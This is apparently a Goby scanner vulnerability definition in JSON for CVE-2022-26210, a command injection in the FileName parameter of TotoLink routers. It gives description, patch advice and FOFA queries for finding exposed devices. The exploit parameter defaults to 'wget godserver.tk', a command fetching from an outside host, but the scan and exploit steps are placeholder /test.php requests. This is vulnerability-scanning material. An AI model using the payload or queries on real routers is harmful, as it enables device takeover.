{ "Name": "TotoLink FileName RCE(CVE-2022-26210)", "Description": "

TotoLink A800R, A810R, A830R, A950RG, A3000RU and A3100R and other routers are all products of TotoLink Company in Taiwan, China.

The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.

", "Product": "TotoLink", "Homepage": "https://www.totolink.net/", "DisclosureDate": "2022-04-02", "Author": "abszse", "FofaQuery": "body=\"cstecgi.cgi\"", "GobyQuery": "body=\"cstecgi.cgi\"", "Level": "3", "Impact": "

The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.

", "Recommendation": "

At present, the manufacturer has released an upgrade patch to fix the vulnerability. For details, please pay attention to the manufacturer's homepage: https://www.totolink.net/

", "References": [ "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "wget godserver.tk", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [] } ], "Tags": [ "Command Execution" ], "VulType": [ "Command Execution" ], "CVEIDs": [ "CVE-2022-26210" ], "CNNVD": [ "CNNVD-202203-1482" ], "CNVD": [ "" ], "CVSSScore": "9.8", "Translation": { "CN": { "Name": "TotoLink 多款无线路由器 FileName 命令执行漏洞 (CVE-2022-26210)", "Product": "TotoLink多款路由器", "Description": "

TotoLink A800R、A810R、A830R、A950RG、A3000RU 和 A3100R等多款路由器是都是中国台湾吉翁电子(TotoLink)公司的产品。

TotoLink 多款路由器FileName 参数在函数 setUpgradeFW 中包含命令注入漏洞。此漏洞允许攻击者通过精心制作的请求执行任意命令。

", "Recommendation": "

目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页:https://www.totolink.net/

", "Impact": "

TotoLink 多款路由器FileName 参数在函数 setUpgradeFW 中包含命令注入漏洞。此漏洞允许攻击者通过精心制作的请求执行任意命令。

", "VulType": [ "命令执⾏" ], "Tags": [ "命令执⾏" ] }, "EN": { "Name": "TotoLink FileName RCE(CVE-2022-26210)", "Product": "TotoLink", "Description": "

TotoLink A800R, A810R, A830R, A950RG, A3000RU and A3100R and other routers are all products of TotoLink Company in Taiwan, China.

The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.

", "Recommendation": "

At present, the manufacturer has released an upgrade patch to fix the vulnerability. For details, please pay attention to the manufacturer's homepage: https://www.totolink.net/

", "Impact": "

The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.

", "VulType": [ "Command Execution" ], "Tags": [ "Command Execution" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }